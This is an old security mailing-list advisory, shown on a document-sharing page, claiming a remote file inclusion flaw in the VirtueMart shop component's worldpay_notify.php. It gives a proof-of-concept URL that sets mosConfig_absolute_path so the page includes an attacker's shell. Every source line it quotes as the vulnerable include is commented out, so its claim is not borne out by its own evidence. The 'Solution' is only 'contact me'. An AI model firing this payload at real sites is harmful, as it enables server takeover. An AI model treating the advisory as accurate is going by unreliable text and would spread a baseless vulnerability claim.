Documents
Resources
Learning Center
Upload
Plans & pricing Sign in
Sign Out

msg00003

VIEWS: 17 PAGES: 1

									                                               VirtueMart

VirtueMart

Source: http://www.derkeiler.com/Mailing−Lists/securityfocus/vuln−dev/2006−09/msg00003.html



      • From: t3rr0r1st@xxxxxxxxxxxxxxxxx
      • Date: 9 Sep 2006 00:41:16 −0000

#Aria−Security.net Advisory
#Discovered by: Dr.T3rr0r1st
#< www.Aria−security.net >
#Gr33t to: The−0utl4w & A.u.r.a & R@1D3N & Smok3r
#−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
Software: VirtueMart
Link: virtumart.net
Attack method: Remote File Inclusion

Source :
//Set up the mailer to infor Warehouse of validated order
//require_once( $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php');
//$mail = new mosPHPMailer();
//$mail−>PluginDir = $mosConfig_absolute_path . '/includes/phpmailer/';
//$mail−>SetLanguage("en", $mosConfig_absolute_path . '/includes/phpmailer/language/');

Proof of Concept:
http://site.com/%5bpath%5d/worldpay_notify.php?mosConfig_absolute_path=shell

Solution
contact me: Advisory@xxxxxxxxxxxxxxxxx




VirtueMart                                                                                    1

								
To top